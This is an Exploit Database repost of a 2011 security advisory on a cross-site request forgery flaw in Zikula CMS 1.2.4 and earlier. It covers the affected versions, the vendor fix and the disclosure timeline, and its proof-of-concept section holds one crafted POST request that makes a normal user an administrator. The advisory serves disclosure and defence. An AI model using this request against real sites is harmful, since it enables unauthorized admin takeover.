Zikula CMS 1.2.4 – Cross-Site Request Forgery

• Exploit Database
• 15 阅读

• 作者： Aung Khant
  日期： 2011-02-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16097/

• Source: http://packetstormsecurity.org/files/view/98060/zikulacms-xsrf.txt
  
  ====================================================
  Zikula CMS 1.2.4 <= Cross Site Request Forgery (CSRF) Vulnerability
  ====================================================
  
  
  1. OVERVIEW
  
  The Zikula 1.2.4 and lower versions were vulnerable to Cross Site
  Request Forgery (CSRF).
  
  
  2. BACKGROUND
  
  Zikula is a Web Application Toolkit, which allows you to run
  impressive websites and build powerful online applications. Zikula has
  received praise for many things, but we belive the highlights are ease
  of use, quick and easy development, security and performance and
  lastly flexibility.
  
  
  3. VULNERABILITY DESCRIPTION
  
  Zikula CMS 1.2.4 and lower versions contain a flaw that allows a
  remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw
  exists because the application does not require multiple steps or
  explicit confirmation for sensitive transactions for majority of
  administrator functions such as adding new user, assigning user to
  administrative privilege. By using a crafted URL, an attacker may
  trick the victim into visiting to his web page to take advantage of
  the trust relationship between the authenticated victim and the
  application. Such an attack could trick the victim into executing
  arbitrary commands in the context of their session with the
  application, without further prompting or verification.
  
  
  4. VERSIONS AFFECTED
  
  1.2.4 <=
  
  
  5. PROOF-OF-CONCEPT/EXPLOIT
  
  The following request escalates a normal user to an administrator.
  
  [REQUEST]
  POST /zikula/index.php?module=users&type=admin&func=processusers&op=edit
  HTTP/1.1
  
  authid=&userid=3&do=yes&access_permissions%5B%5D=2&access_permissions%5B%5D=1&uname=tester&email=tester%40yehg.net&pass=&vpass=&activated=1&theme=&submit=
  [/REQUEST]
  
  
  6. SOLUTION
  
  Upgrade to Zikula 1.2.5 or higher
  
  
  7. VENDOR
  
  Zikula Foundation
  http://zikula.org/
  
  
  8. CREDIT
  
  This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
  Ethical Hacker Group, Myanmar.
  
  
  9. DISCLOSURE TIME-LINE
  
  2010-12-24: notified vendor
  2011-01-25: vendor released fix
  2011-02-01: vulnerability disclosed
  
  
  10. REFERENCES
  
  Original Advisory URL: http://yehg.net/lab/pr0js/advisories/
  Vendor Released Info:
  http://community.zikula.org/index.php?module=News&func=display&sid=3041&title=zikula-1.2.5-released
  Zikula 1.2.5 Changlog:
  http://code.zikula.org/core12/browser/tags/Zikula-1.2.5/src/docs/CHANGELOG
  CSRF Wiki: https://secure.wikimedia.org/wikipedia/en/wiki/Cross-site_request_forgery
  
  
  #yehg [2011-02-01]
  
  ---------------------------------
  Best regards,
  YGN Ethical Hacker Group
  Yangon, Myanmar
  http://yehg.net
  Our Lab | http://yehg.net/lab
  Our Directory | http://yehg.net/hwd